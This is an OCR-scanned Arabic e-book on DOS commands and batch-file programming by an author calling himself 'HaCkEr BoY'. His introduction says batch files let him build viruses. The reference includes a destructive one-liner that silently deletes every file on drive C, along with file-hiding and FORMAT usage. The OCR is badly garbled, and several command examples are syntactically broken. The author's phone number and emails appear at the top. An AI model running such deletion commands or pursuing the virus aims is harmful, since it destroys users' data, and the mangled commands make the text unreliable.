سامر بكار بكار ^HaCkEr BoY^‏ 


المؤلف: سامر بكار بكار. 
للاتصال: 
http://www.hacker-boy.150m.com‏ 
http://samerbb.jeeran.com‏ 
MSN Messenger : Samer_b_b@hotmail.com‏ 
Yahoo Pager : Samer _b_b@yahoo.com‏ 
Phone: +96392338686‏ 
ملاحظة: إذا قمت بإرسال رسالة فضع كلمة "كتاب دوس" كعنوان للرسالةء ثم ضع ما تريد داخلها. 
إن حقوق كتاب "كتاب دوس وصولا لبرمجة الملفات الدفعية" محفوظة للمؤلف» ولا يحق لأي شخص كان 


طباعته أو نشره دون إذن خطي من المؤلف تحت طائلة الملاحقة القانونية» لكن يسمح بنشره في أي موقع بعد 
إرسال رسالة إلى المؤلف تخبره بذلك. 


كتاب دوس .. وصو لا لبرمجة الملفات الدفعية ^HaCkEr_BoY^‏ 


NIY 


أهدي هذا الكتاب إلى أغلى مخلوقين في هذه الدنيا على قلبي» من علماني 
أن لك هر ور اة و الل فاه من تعمل ةه ااي ا 
أنا عليه» من كانا سبب وجودي.. أبي و أمي» وأهدي ما صنعت إلى أطيب 
أخ.في. الدنياء أستاذي الذي لم ولن أنكر أني لولاه لم أتعلم حرفا إنجليزياً أو 
سطرا حاسوبياء أطمحٌ البشر في الدنياء وأجذهم.. أخي الكبير موفقء كما 
أهديه أيضاً إلى كل من الشيوخ» أحمد بكار» وحمزة الشمالي» وفراس 
القاسم» لأنهم أشخاص لا يوفر لي غيرهم الطمأنينة و النصيحة التي أكون 
متأكذا .مق جدواها بمجرد. مماعهاء وأهدي هذا العمل المتواضع. إلى أعذ 
أصدقائي.. محمود بكارء و طاهر بكارء و عبد الرحمن الشمالي» وحمزة 
بكار» فمن السهل أن تجد ألف صديقء ولكن من الصعب أن تجد صديقا 


انعد | عورف مى اة 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


٠/‏ المقدّمة: 


بسم الله الرحمن الرحيم؛ والصلاة و السلام على سيد المرسلين محمد (صلى الله عليه و سلم)» وعلى أصحابه 
أجمعين» وعلى آل بيته الطيبين الطاهرين. 


اللهم لا علم لنا إلا ما علمتنا إنك أنت العليم الحكيم. 


أخي القارئ .. ما سأحاول قوله في البداية» أن هذا الكتاب» ليس الكتاب السحري الذي سيجعلك تتقن ما 
يتحدث عنه من أول قراءة» إنما هو كغيره من الكتب» يحتاج إلى التمحيص و التفكرء ليس بمادته العلميةء إنما 
بربط أفكاره ببعضها وصولاً إلى ما هو جديدء أما نصيحتي فيما يتعلق بهذا الكتاب» أن تقرأ الكتاب للمرة الأولى؛ 
قراءة و فهماء بالإضافة إلى حفظ ما ترى أنه يجب أن يُحفظء أي الأوامر» و نتائجهاء وطريقة كتابتهاء و لا تقلق 
إن شعرت أنك لا تستوعب» فهو شعور يصيب الغالبية» أكمل قراءة الكتاب» و ابدأ بقراءته مرة أخرىء» ستجد أن 
لديك القدرة على فهم كل كلمة منه. 


٠‏ لمن هذا الكتاب؟ 


إن هذا الكتاب موجه إلى كافة الفئات من المتعلمين» مبتدئين» متوسطين: وحتى المحترفين؛ إن ما يجعلني 
متأكداً من فاعليته لدى المحترفين أني حاولت وضع أغلب أوامر نظام التشغيل دوس» وإن أغفلت شيئاء فإنما فعلت 
ذلك لأن الأمر غير هامء أو ليس له أي إفادةء فإن تعلمت و حفظت ما هو موجود في هذا الكتيب المتواضعء 
ستكون قد أضفت لغة جديدة من لغات البرمجة إلى خزانتك العلمية» بالإضافة إلى تعلمك نظام التشغيل 508. 


لاما هو دوس؟ 


إن دوس عبارة عن نافذة سوداء» ليس فيها ما يتحرك سوى المؤشر الذي يشير إلى مكان الكتابة» ندخل له 
الأوامر بشكل مكتوب» ويعود هو لنا بالنتائج بشكل مكتوب أيضاء يفيدنا دوس في التعامل مع الحاسوب مثل 
وندوس تماماء ولن يستطيع أي مستخدم الاستغناء عنه خصوصا إذا اراد عمل ۴٥٣٤‏ أو kونف۴‏ للها رد 
ديسك» لكن فائدته القصوى التي دفعتني لكتابة و شرح أوامره هناء هي التي سنجنيها عند كتابة الملفات الدفعية. 


/لاماهى الملفات الدفعية؟ 
هي ملفات تنفيذية لاحقتها 53+4. » تقوم بتنفيذ مجموعة من الأوامر (وهي المكتوبة داخلها)» عند تشغيلهاء و 


الأوامر التي تكتب داخل الملفات الدفعية هي أوامر نظام دوس ذاتهاء إلا أن هناك مجموعة من الأوامر الخاصة 
بالملفات الدفعية والتي لا تستخدم خارجها. 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


۷ ما الذي يدفعني لتعلم هذه الأمور الكلاسيكية؟ 
سأجيب عن هذا السؤال بذكر الأمور التي دفعتني أنا لتعلمها.. 
أولاً الفيروسات.. 


فمن خلال تعلم الملفات الدفعيةء تمكنت من صناعة فيروسات جميلةء سأذكر بعضاً منها في هذا الكتاب» ومن 
روائع الملفات الدفعية أنها قابلة للتحويل إلى صيغة ملف تنفيذي 2208 » وذلك يجعها تبدو تماما كالفيروسات 
المصنوعة بلغة © أو ++07. أو غيرها من لغات البرمجة العالية المستوى. 


ثانياً البرمجة بلغات أخرى.. 


لقد ساعدتني الملفات الدفعية أثناء برمجتي في فيجيوال بيسيك على التخلي عن العديد من سطور ال۸۴1 
(Application Programming Interface)‏ أي واجهة برمجة التطبيقات» والتي تعتمد على استدعاء وظائف 


(هذا في الملفات الدفعية)» أما في ال451. فستكلف العملية السابقة أكثر من 30 كلمة للوصول إلى نفس النتيجة. 


ثالثاً صناعة ملفات خدمية خاصة.. 


في إحدى المرات تعرضت لفايرس يقضي على الاختصارات» وبكل بساطةء تجاهلت الفايرس: وصنعت ملفا 
دفعياً يعيد لي الخدمة رغماً عن أنفه» هذا بالإضافة إلى الملفات الأخرى مثل برنامج صغير يقوم بإفراغ مجلد 
TEMP‏ و مجلد INTERNET FILES‏ /1131201:4[12 و مجلد 1150101111 بضغطة زر. 


مفاد كلامي أننا من المستحيل أن نستغني عن أي شئ حتى ولو كان قديما بعض الشئ (أقصد المعلومات). 


Created By Samer Bakkar ^HaCkEr BoY^ 4 


كتاب دوس .. وصو لا لبرمجة الملفات الدفعية ^HaCkEr_BoY^‏ 


» »© 


م دوس 
DOS‏ 


أوامر نظام التشغيل دوس: 


أريد قبل البدء أن أنوه إلى أن كل أمر له الكثير من الخيارات الفرعية (الأفضليات)»ء و نحن لسنا مقيدون بهاء 
إنما يمكننا أن نضع ما نحن بحاجة إليه دون أن نلتزم بوضع البقية» لأن للبقية حالة افتراضية سيتبعها ويندوز 
تلقائياً؛ لنبحر الآن في أوامر نظام التشغيل دوس.. 


¥ ASSOS: 
يعرض أنواع الملفات في النظام» كما يتيح إمكانية تعديلهاء أو تعريف نوع جديد؛ يمكن كتابة الأمر دون كتابة‎ 
: شئ بعده لعرض أنواع الملفات و مشغلاتهاء وسيعطي نتائج كالتالي‎ 
.aifAIFFFile 
.aifc=AIFFFile 
.aifEAIFFFile 
.ais=ACDSee.ais 
.ani=ACDSee.ani 
.api=AcroExch.Plugin 
.arj=WinRAR 


.mdz=Access.Database Wizard Template.10 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


.mgc=MediaCatalogMGC 
.mid=midfile 
.midi=midfile 
.mml=MediaCatalogMML 
.mmm=MPlayer 


.mmw=MediaCatalo gMM W 


و هو يدل بذلك على أنواع الملفات بالإضافة إلى المشغلات (برامج التشغيل)» فمثلاًء كل الملفات ذات اللاحقة 
صصص. یتم تشغيلها بواسطة برنامج 12/121336 


ويمكن معرفة برنامج تشغيل أي نوع من الملفات بكتابة الأمر: 
ASSOC .mmm‏ 


و نضع بدل صصص نوع الملفات الذي تريد معرفة برنامج تشغيله» وإذا أردنا تغيير أي نوع» يكون الأمر 
كالتالى: 


مثلا نريد تغيير نوع 5010717. من MPlayer‏ إلى Samer‏ .. 

ASSOC .mmm=Samer 
ستظهر لدينا النتيجة التالية: 5:21 تلنتتقللة.‎ ۸890٤٥ الآن إذا كتبنا الأمر صصص.‎ 
ويمكن بواسطة الأمر 48550600 تعريف نوع جديد من الملفات» ويكون شكل الأمر كالتالي:‎ 


ASSOC .saz=SazProg 


و بذلك نكون قد عرفنا كل الملفات ذات اللاحقة zهء.‏ على أنها تابعة للبرنامج (أو يتم تشغيلها بواسطة 
البرنامج ) 52212108 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


7١ AT: 


و يحتوي على مجموعة من جداول الأعمال و البرامج التي ستعمل على الكومبيوتر في أوقات و تواريخ 
محددة» و يمكن استعراض جدول الأعمال بكتابة الأمر التالي: 


AT 

أما إن أردنا كتابة مهمة جديدة فيكون العمل على الصيغة التالية: 
AT [\\computername|] |] [id] /DELETE] | /DELETE [/YES]]‏ 
AT [\computername] time [/INTERACTIVE]‏ 


| /EVERY:date[,...] | /NEXT:date|[,...]] "command" 


me‏ هو اسم الكومبيوتر الذي سيتم وضع المهام و المواعيد عليه. 

4 هو رقم الأمر ضمن لائحة الأوامر الموجودة. 

7115 يقوم بإلغاء أمر ضمن اللائحة» وإن تم تجاهله سيتم إلغاء و حذف كافة اللائحة. 
5 يستخدم مع أمر إلغاء كافة الأعمال عندما لا تكون هناك حدود أو حواجز. 

م هو الوقت الذي سوف تعمل فيه المهمة. 

7 يسمح للأمر بالتفاعل مع كافة المستخدمين عند عمله. 

[...]6761::0816/ وهو أمر لتكرار المهمة في يوم الأحد من كل أسبوع مثلاً. 


[....]26:0816/ يقوم بتشغيل المهمة في يوم تالي» متلا إن كانت المهمة يوم السبت» يمكن تشغيلها بعد 
ثلاثة أيام أو عدد الأيام الذي تحدده أنت. 


"command"‏ وهو المهمةء ويمكن أن نضع فيها مسار برنامج» أو ملف دفعي» أو أي أوامر أخرى. 
إن هذه الخيارات يمكن إغفال بعضها لكن الأهم هو اسم الكومبيوترء و الوقت» و المهمة. 


مثلا: الأمر التالي سيقوم بتشغيل المفكرة تمام الساعة الثانية ظهراً من اليوم الذي أدخلت فيه 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


AT \\jessica 14:00 notepad.exe 


¥ ATTRIB: 
يقوم بعرض» وتعديل خصائص الملفات» مثل خاصية 'مخفي" أو للقراءة فقط"...‎ 
لعرض آخر التعديلات على خصائص الملفات بالإضافة إلى الملفات التي تم تعديل خصائصها نكتب التالي:‎ 
ATTRIB 
أما لتعديل خصائص ملف» فنقوم بإتباع الصيغة التالية:‎ 
ATTRIB [FR | -R|] [FA | -A | [+S | -S| [+H | -H] [drive:][path][filename] 


[/S [/D]| 


78 هو الأمر الأساسي الذي سنعمل به. 

+ أو - تستخدم لإضافة أو إزالة خاصية ما إلى و من الملف. 
+ اختصار ل 2630-0217 أي للقراءة فقط. 

A‏ اختصار ل Archive‏ أي ملف أرشيف. 

5 اختصار ل ١ء‏ ءر؟ أي ملف نظام. 

11 اختصار ل 1110065 أي مخفي. 

filename [‏ | [طتدم][:»0117] وهي مكان وجود الملف. 


9 و يستخدم عندما نريد تنفيذ الأمر (أي تعديل الخصائص) ليس على ملف فقطء إنما على كافة الملفات 
الموجودة في كافة المجلدات في المسار الذي نحدده. 


0/ نفس عمل السابقةء لكن تختلف عن سابقتها في طريقة إظهار النتائج. 
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كتاب دوس .. وصو لا لبرمجة الملفات الدفعية ^HaCkEr_BoY^‏ 


مثال: لتغيير خاصية الملف المسمى 7777.66 الموجود على السواقة 0:١‏ إلى ملف مخفي نكتب: 
Attrib +h d:\ww.exe‏ 
و لإظهار (أي إزالة خاصية مخفي عنه)» نكتب: 
Attrib —h d:\ww.exe‏ 
و هكذا نستخدم الخصائص الأخرى. 
BREAK:‏ ¥ 


أمر يستخدم عند كتابة الملفات الدفعية» ووظيفته إما السماح أو عدم السماح بإيقاف الملف الدفعي عن العمل 
عندما يبدأء حيث يمكن إيقاف عمل الملف الدفعي بضغط الزرين © +0151 معا. 


لمنع الإيقاف نكتب الأمر: 
BREAK OFF‏ 
و للسماح به نكتب: 
BREAK ON‏ 


yJ CACLS: 


و يستخدم لعرض و تعديل صلاحيات المرور (الوصول)»ء وذلك فيما يتعلق بالسواقات أو الملفات» لكن هذا 
الأمر لا يعمل إلا مع الأقراص 10117655 ذات نظام الملفات )N1۴8‏ التي تعمل عليها أنظمة Windows XP‏ 


لعرض هذه الصلاحيات نكتب: 
CACLS c:\‏ 
و سيعطينا النتيجة التالية: 
c:\ BUILTIN\Administrators:(OI1)(CD)F‏ 
NT AUTHORITY\SYSTEM:(OI)(CI)F‏ 


CREATOR OWNER:(OI)(CI(IO)F 


BUILTIN\Users:(OD(CDR 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


BUILTIN\Users:(CI)(special access:) 


FILE APPEND DATA 


BUILTIN\Users:(CI)([O)(special access:) 


FILE WRITE DATA 


Everyone:R 


شرح هذه النتيجة موجود في التالي» لتعديل خاصية أو أكثر من خصائص الوصولء نستخدم الصيغة التالية: 


CACLS filename [/T] ]/8[ [/C] [/G user:perm] [/R user [...]] 
[/P user:perm ]...[[ /D user [...]] 


111623126 وهو اسم الملف» هذا إذا كنا نتعامل مع ملف فقط (أي ليس مع سواقة كاملة). 


'1/ هذا إذا أردنا تطبيق مجموعة الخصائص الجديدة على كافة الملفات الموجودة في نفس السواقة وفي 
المجلدات الأخرى الفرعية. 


17/ تعديل قائمة مهام الوصول بدلا من استبدالها. 

©/ التكملة عند وجود أخطاء منع الوصول. 

0 6 / وهو لمنح احد المستخدمين صلاحيات وحقوق جديدة» وهو إما أن يكون: 
2 اختصار ل 2630 أي قراءة. 
7 اختصار ل ما أي كتابة. 
© اختصار ل 013286 أي تعديل أو تغيير. 


۴ اختصار ل 11011602401 أي صلاحيات كاملة. 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


51 1/ وهو لسحب أو إلغاء بعض أو كل صلاحيات أحد المستخدمين. 


61 ۶/ تبديل صلاحيات و حقوق الأعضاءء ويمكن أن يأخذ نفس قيم 6/ 


:6 (1/ منع صلاحيات وصول المستخدم. 
هناك طرق لتخصيص الصلاحيات لأكثر من ملف» كما يمكن تخصيص صلاحيات أكثر من مستخدم. 


1 سيتم توريث الصلاحيات إلى المجلدات الأخرى» 01 لتوريث الصلاحيات للملفات الأخرى» 10 توريث 


CALL:‏ لا 
آمو يستفدم فى قات التفعيكه و يكن مق الأتصال :يملق دقعي أخن وينيتقدم كالثالي: 
CALL c:\autoexec.bat‏ 
CD:‏ الا 
يستخدم أثناء التنقل بين المجلدات» وله عدة أشكال» أهمها: 
CD‏ 


يستخدم لعرض الموقع الحالي. 


CD FolderName 


للدخول إلى المجلد FolderName‏ 


CD.. 


للرجوع إلى الوراء مجلد واحدء أي كما لو ضغطنا زر لأعلى في متصفح ويندوز. 


CD\ 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


للرجوع دفعة واحدة إلى المجلد الرئيسي أي إلى سطح السواقةء فلو كنا في: 
C:\Documents and Settings\SamerBakkar\Desktop>‏ 
و کتبنا ا٥‏ 
سيعود بنا المحث إلى الفهرس: 
C:>‏ 
y CHCP;‏ 


لعرض أو تعديل رقم صفحة الكود النشطء للعرض نكتب الكود دون إضافات» أما إذا أردنا التعديل» فنضيف 
الرقم أو الكود الجديد كالتالي: 


CHCP 321 


y CHKDSK: 


CHKDSK [volume[[path]filename]]] [ZF] /V] UR] UX] UI] UC] ULI[:size]] 


٥ا0‏ هو الحرف الذي يشير للسواقة» أو اسم السواقة. 


10 يعمل فقط مع نظام الملفات ۴۸1,۴۸732 ويستخدم لتحصيص أو ترتيب الملفات للتأكد من عدم 


۴/ لعرض الأخطاء التي تم إصلاحها. 
7/ يعمل فقط مع نظام الملفات ۴۳۸۲,۴۸732› و يعرض المسار الكامل لكل ملف على القرص. 


۸/ لعرض رسالة تتضمن الخلايا التالفة في الهارد ديسك أو السواقة التي تم فحصهاء بالإضافة إلى الملفات 
التي تمت استعادتها. 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


y CHKNTES: 
لعرض أو تعديل خصائص فحص الديسك وقت الإقلاع؛ للعرض نستخدم الصيغة:‎ 
CHKNTFS c: 
أما للتعديل» فنستخدم:‎ 
CHKNTFS volume [...] 
CHKNTFS /D 
CHKNTFS /T[:time] 


CHKNTFS /X volume [...] 


CHKNTFS /C volume [...] 


ا0 هو حرف السواقة أو اسمها. 


0 يقوم باستعادة الجهاز إلى وضعه الافتراضي» و يشغل فحص الأقراص ظقائياً إن كانت السواقة متسخة و 
بحاجة لذلك. 


م٣٣‏ / يقوم بتعديل الزمن التنازلي لبدء فحص الأقراص التلقائي إلى زمن مخصص إبالثواني]. 
اا0 22/ يمنع فحص السو اقة التلقائي عند الإقلاع» نلاحظ أن 701111236 اسم السواقة التي نحن بصددها. 
مصuاەv‏ 0/ تحديد سواقة لفحصها عند الإقلاع. 

7 CLS; 
لتنظيف محتويات الشاشة؛ لاستعماله نكتب فقط:‎ 


CLS 


7١ CMD: 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


لتشغيل نسخة جديدة من نافذة دوس. 


¥ COLOR: 
لضبط لون الكتابة و لون الخلفية في نافذة دوس» ويستخدم كالتالي:‎ 
COLOR 
لاستعادة الألوان الافتراضية.‎ 
COLOR FB 


تشير ۴ إلى لون الخلفية» و 8 إلى لون الكتابةء و الجدول التالي يبين ما يمكن وضعه مکان ۴و 8 : 


7١ COMP: 


يمكن لهذا الأمر أن يقارن بين ملفين أو مجموعة من الملفات؛ و يحدد الفروق بينهاء مثل أيها أكبر أو أطول؛ 
الاستخدام كالتالي: 


COMP C:\1stFile.exe f\2ndFile.exe 


و يمكنه أن يتعامل مع أي لاحقة. 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


y COMPACT: 


يقوم بضغط السواقات وبالتالي الملفات الموجودة داخلها بهدف توفير مساحة إضافية على القرص» وشكله 
كالتالي: 


COMPACT d:\ww.exe 


y CONVERT: 


يقوم بتغيير نظام الملفات في قرص أو أكثر من ۴۸۲ إلى 1۴8 لكن لا يمكن تغيير نظام ملفات السواقة 
التي تعمل عليها الآن. 


y UOPY; 
: لنسخ ملف من مكان إلى آخر ويكون شكله كالتالي‎ 
COPY [1stplace] [2ndplace] /y /-y 
لنسخ الملفات دوت عرض تأكيد على المستخدم.‎ / 
إ-/ لعرض التأكيد.‎ 
مثال» لنسخ الملف 718/177.57611 من السواقة © إلى المجلد 1010611 الموجود على السواقة (1 نكتب:‎ 
COPY c:\ww.exe d:\Folder1\ 
y DATE: 


التاريخ الجديد» من الشكل: 


<mm.dd.yy> 


ص[ هي الأشهرء فإن كنا في الشهر الثاني نكتب 02 


3 هي الأيام 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr BoY^‏ 


ر۲ السنين» مثلا 2005 نكتب 05 
DEL:‏ الا 
لحذف ملف أو ملفات» ولهذا الأمر الشكل التالي: 


DEL [/P| [/F] ]/5[ ]/0[ |ث/]‎ |] : [ 21111165[[ 


/ للتنبيه قبل حذف أي ملف. 
۴/ للحذف السريع فيما يتعلق بالملفات ذات الصفة 'للقراءة فقط". 
5 لحذف كافة الملفات الموجودة في نفس المجلد و في المجلدات الفرعية الموجودة داخله. 
0/ خيار يجعل النظام يحذف الملفات دون تنبيه. 
8/ لاختيار أنواع معينة من الملفات و يتضمن: 
۸R‏ ملفات القراءة فقط. 
H‏ الملفات المخفية. 
۸ ملفات الأرشيف. 
5 ملفات النظام. 
*فمثلاً: لحذف كافة الملفات في السواقة ©» دون تنبيه نكتب: 
DEL c:\*.* /S/Q‏ 
أما لحذف كافة الملفات المخفية من السواقة © مع التنبيه قبل الحذف نكتب: 
DEL c:\*.* /P/S/A:H‏ 
أما لحذف ملف محددء مثلا الملف W.8×۴‏ 0 الموجود على السواقة © نكتب: 


DEL c:\ww.exe 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


y DIR: 


لعرض الملفات و المجلدات الموجودة في الفهرس (المجلد) الذي نحن فيه الآن فقطء نكتب الأمر دون 
إضافات: 


DIR 
أما إن أردنا تخصيص الأمرء فلدينا الصيغة التالية:‎ 
DIR [drive:][path][filename|] [/A[[: ]attributes]] [/B] UC] /D] UL] [N] 


[VOI[:]sortorder]] [/P] [Q] [/S] UTI[:]timefield]] /W] [/X] [/4] 


:7 هي السواقة التي نريد تطبيق الأمر عليها. 
P1‏ إذا اردنا استعراض محتويات مجلد معين. 


4/ لتخصيص العرضء أي عرض ملفات من نوع معينء وإن كتبنا هذا الخيار دون إضافة أي أنواع بعده 


(راجع تفرعات هذا الأمر في الأمر السابق) نكتب / و سيتم عرض كافة الأنواع. 
8/ يقوم بعرض المحتويات دون أي تفاصيل مثل الحجم و تاريخ التعديل ... 
0/ لعرض المجلدات و الملفات التي يزيد حجمها عن 1000 كيلو بايت» لإلغاءه (لأنه الافتراضي) نكتب 0-/ 
0/ عرض النتائج بشكل أعمدة. 
آ/ لعرض نتائج بحد أدنى. 
/N‏ لعرض الأسماء الطويلة. 
: لترتيب النتائج بحسب التفرعات التالية: 


8 بحب الحجة: 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


N‏ بحسب الاسم. 
( بحسب التاريخ. 
۴/ لعرض النتائج صفحة تلو الأخرى» فسيتوقف كلما عرض صفحة منتظرا ضغط أي مفتاح حتى يكمل. 
0/ لعرض مالك الملفات» أي الشركة المصنعة. 
5 لعرض كافة الملفات و المجلدات حتى في المجلدات الفرعية. 
1/ يتعلق بعرض آخر وقت لتشغيل الملف أو تعديله أو حتى كتابته. 
۷/ لعرض الملفات مصفوفة بشكل عرضاني في الشاشة. 
4/ لعرض السنوات أربع أرقام. 
DISKCOMP:‏ ¥ 
أمر يقوم بمقارنة محتويات قرصين مرنين» وله الشكل: 
DISKCOMP drivel: drive2:‏ 
فمثلا لمقارنة الفرق بين قرصين» الأول في السواقة :۸ و الثاني في :8 » نكتب: 
DISKCOMP A: B:‏ 
DISKCOPY:‏ ¥ 
لنسخ محتويات قرص مرن إلى قرص مرن آخرء ويتبع نفس صيغة الأمر السابق. 
DOSKEY:‏ ¥ 


من أروع أوامر نظام دوس» في الحقيقة أنه ليس له حاجة في نظام ۴× لأن نظام ۴× سيقوم بتنفيذه تلقائياء 
إن هذا الأمر يقوم بحفظ و تخزين كافة الأوامر التي يكتبها المستخدم» حيث يمكن للمستخدم أن يسترجع أي أمر 
كان قد كتبه سابقا (في حدون الجلسة وليس الأيام)» بواسطة الأسهم في لوحة المفاتيح» ففي السابق (منذ عشرة 
سنوات أو أكثر) كان نظام دوس (دوس الحقيقي و ليس الموجود داخل وندوس) منتشرا انتشارا واسعا بين 
المستخدمين» وكان على المستخدم أن يكتب الأوامر التي يحتاجها للتعامل مع جهازه» وهذا أمر ممل إذا كانت 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


هناك أسطر طويلة يجب على المستخدم إعادتهاء لذلك كان الأمر 0051669 فائدة خاصة»؛ والآن لنعد لموضوعنا و 


نرى تفرعات هذا الأمرء إن هذا الأمر له تفرعات كثيرة سأقوم بعرض أهمهاء وهي: 


DOSKEY /HISTORY 
لعرض الأوامر التي تم تخزينها.‎ 
DOSKEY /REINSTALL 
لتشغيل نسخة جديدة» أي مسح محتويات نسخة.‎ 
و هناك تفرعات أخرى لا أجد أن المستخدم بحاجة إليها و الوقت الحالي.‎ 
7١ ECHO: 


من أوامر الملفات الدفعية» وظيفته الرئيسية هي عرض المسار أو إخفاءه» و أقصد بعرض المسار أي ما يكتبه 
ويندوز بشكل تلقائي عند تشغيل نافذة الدوس مثل: 


C:\Documents and Settings\HackerBoy\Desktop> 
فإذا أردنا إيقاف عرض المسار بواسطة الأمر 80110 يكون الأمر كالتالي:‎ 
ECHO OFF 


و النتيجة أن الأوامر سوف تكتب بجانب الحد الأيسر لنافذة الدوس دون أن يكون هناك شئ مكتوب قبلهاء 
حاول كتابة الأمر 0۴۴ 80110 لديك و سترى النتيجة» و لإعادة عرض المسارات نكتب الأمر: 


ECHO ON 


و من وظائف هذا الأمر عرض رسائل على المستخدم» فلو أردنا عرض كلمة 1٤110‏ نكتب: 
ECHO HELLO‏ 


سنلاحظ أن كلمة E٥810‏ اختفت و بقيت كلمة .H]٤ 1L0‏ 


يمكن من خلال الأمر 8010 إضافة بعض الكلمات إلى ملف نصنعه يدوياء سأوضح كلامي بمثال مشروح. 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^~HaCkEr_BoY^‏ 
إذا أردنا أن نصنع عن طريق الملق الدفعي ملف نصي مكتوب فيه 288216185 53061 (يمكن أن يكون ملفا من أي 
نوع وليس فقط ملف نصي)» فسنفعل ذلك باستخدام الأمر: 
ECHO Samer Bakkar > File.txt‏ 


بواسطة الأمر السابق نكون قد صنعنا ملفا نصياً اسمه 1116.6 مكتوب داخله 821188 53067 أي ستتم 
کا كل كن مرخرد قل ارمز < إلى للف اللاي سعددة سف يعد ذلك اترم 


الآن إن فتحنا المستند سنجد في داخله جملة: 
Samer Bakkar‏ 


و لإضافة عبارة أو سطر جديد إلى المستند الذي صنعناه قبل قليل بدلا من إشارة < مفردة» نضع واحدة مزدوجة 


أي << بحيث يصبح الأمر كالتالي: 
ECHO Is The Generator Of This Code << File.txt‏ 
والآن إن عدنا و فتحنا نفس المستند سنجد داخله التالي: 
Samer Bakkar‏ 
Is The Generator Of This Code‏ 
حاول تطبيق المثال السابق و حاول تغيير صيغة الملف الذي سينتج إلى صيغ أخرى (ع66. مثلا). 
ERASE:‏ ¥ 


نفس عمل الأمر (٤1‏ (حذف الملفات)» و هو لا يختلف عنه بأي شيءء و يمكن استخدام نفس الصيغة و 


نفس الأفضليات. 
y EXIT:‏ 
لأغلاق نافذة الذرس: 
y FC:‏ 


لمقارنة ملفين و عرض الفروق بينهماء يتبع الصيغة: 


FC 1stfile.* 2ndfile.* 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


*.15616 هو الملف الأولء» و يمكن كتابة المسار الكامل للملف (هذا إن كانا موجودين في فهرسين مختلفين) 


مثل: €×ع. c:|w Ww‏ 
۴1e.*‏ 2 وهو الملف الثاني . 
y FIND:‏ 
يقوم بالبحث عن نص معين داخل ملف نصي (سلسلة نصية)» ويتبع الصيغة التالية: 


FIND [/V| [/C] UN] [I] "string" [[drive:][path]filename] ...]] 


۴0 هو الأمر الذي سنعمل به. 
7/ خيار يقوم بعرض كافة الأسطر التي لا تحتوي على كلمة البحث. 
0/ خيار يقوم بعرض عدد الأسطر التي تحتوي على كلمة البحث. 
/١1‏ لعرض أرقام الأسطر مع الأسطر التي تحتوي على كلمة البحث. 
1 تجاهل حالة الأحرف» أي ما يقابل بحث غير مطابق في وندوس. 
”5108“ هو النص الذي نريد أن نبحث عنه. 
عمطقصطع111لط] 101712 هو مسار الملف الذي نريد أن نبحث فيه. 
y FINDSTR:‏ 


للبحث عن عدة نصوص في عدة ملفات معا. 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr BoY^‏ 


0 FOR: 


أمر ب يستخدم في الملفات الدفعية» و يقوم بتنفيذ أمر أو أوامر عند وجود قيمة أو تحقق شرطء لكنه يختلف عن 
الأمر 1۴ الذي سنتحدث عنه لاحقاء وهو يأخذ الصيغة التالية: 


FOR %variable IN (set) DO command [command-parameters] 


م وهو المتغير الذي نريد تنفيذ أمر عند مساواته لقيمة معينة. 


(56) 171 لا يكتب» لكنه يشير إلى أن المتغير يجب أن يعرف في مجموعة المتغيرات لدى وندوس» سأقوم 
بالتفصيل حول هذا الموضوع عند شرح الأمر '511. 


0 أمر يعلم و يندوس أن الأوامر سوف تبدأ بعد هذه الكلمة. 


]sئparameter-command] Command‏ هي الأوامر و تفرعاتها و التي سنضعها لكي يتم تنفيذها إذا تحقق 
الشرط. 


إذا أردنا تعريف متغير بأنفسنا - وليس استخدام المتغيرات المعرفة تلقائيا من قبل ويندوز - فيجب أن نضع 
0 قبل المتغير وليس إشارة % مفردة» ويجب أن نلاحظ أن 11 تختلف عن ط أي حالة الحرف كبير أم صغير 
تؤدي إلى اخثلاة في النتيجة. 


مثال: (لا تشغل نفسك به كثيراً لأني سأقوم بتوضيحه فيما بعد) 
FOR %HOMEDRIVE=c: DO copy a:\*.* c:\‏ 
FOR %HOMEDRIVE=d: DO copy a:\*.* d:\‏ 


و معناه أنه إن كانت السواقة الأم هي :© فانسخ محتويات السواقة :8 إليهاء وإن لم تكن فلا تفعل شيئاًء و 
السطر الثاني يحاول التأكد أن :0 هي السواقة الأم ليؤدي نفس المهمة إن وجدها كذلك. 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


¥ FORMAT: 
الأمر المعروف لدى كل المستخدمين» ومن لا يجيد استخدامه لا بد أن يكون قد سمع به.‎ 


وظيفة هذا الأمر هي مسح كافة محتويات السواقة بعدة طرق (سريعء بطيء) و بإمكانه تغيير اسمهاء و نظام 
ملفاتهاء و يأخذ الصيغة التالية: 


FORMAT Drive: /Q/U/V:Label /FS:FileSystem 


© هي السواقة التي نريد تطبيق الأمر عليهاء وهي إما أن تكون :© أو :5 أو أي حرف يشير إلى إحدى 
السواقات. 


0/ أي مسح سريع. 

لا/ مسح بطيء مع إعادة تقسيم و تفصيل الخلايا في الهارد ديسك أو السواقة المرنة. 
